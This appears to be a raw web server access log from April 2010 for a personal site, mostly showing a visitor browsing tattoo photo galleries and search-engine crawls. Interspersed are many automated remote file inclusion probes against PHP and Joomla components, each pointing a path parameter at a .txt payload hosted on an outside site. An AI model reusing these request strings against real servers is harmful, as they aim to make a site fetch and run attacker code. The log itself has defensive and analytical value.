116.122.36.61 - - [07/Apr/2010:09:35:10 -0500] "GET /logs//errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:35:12 -0500] "GET //errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:35:12 -0500] "GET /logs//errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:35:12 -0500] "GET /logs/access_log.1218067200%20%20//errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.207.125 - - [07/Apr/2010:09:35:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.217.216.132 - - [07/Apr/2010:09:35:41 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:09:35:41 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:09:35:41 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:09:37:35 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:09:37:35 -0500] "GET /?sourcedir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:09:37:35 -0500] "GET /logs/?sourcedir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 200 805 "-""Mozilla/5.0"
76.68.90.49 - - [07/Apr/2010:09:38:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:23 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:45 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:38:46 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:14 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:15 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:27 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:27 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:27 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
76.68.90.49 - - [07/Apr/2010:09:39:27 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
211.239.124.204 - - [07/Apr/2010:09:40:16 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:40:16 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:40:20 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:41:15 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:41:16 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:41:16 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.199.46 - - [07/Apr/2010:09:43:28 -0500] "GET /logs/access_log.1246579200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.228.44 - - [07/Apr/2010:09:47:09 -0500] "GET //download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:09:47:09 -0500] "GET /logs//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:09:47:09 -0500] "GET /logs/access_log.1268611200%20%20//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:48:09 -0500] "GET /logs/access_log.1267920000%20%20////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:48:09 -0500] "GET /logs////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:48:09 -0500] "GET ////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:09:50:14 -0500] "GET /logs/old_reports.php?file=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:09:50:14 -0500] "GET /logs/access_log.1261180800/old_reports.php?file=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:09:50:14 -0500] "GET /old_reports.php?file=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:09:50:14 -0500] "GET /logs/access_log.1257292800/old_reports.php?file=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:08 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:09 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:09 -0500] "GET /logs/access_log.1267920000%20%20//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 389 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:22 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:23 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:09:51:23 -0500] "GET /logs/access_log.1267920000%20%20//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 389 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:51:34 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:51:35 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:51:35 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:52:22 -0500] "GET /logs/access_log.1267920000//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:52:26 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:52:26 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
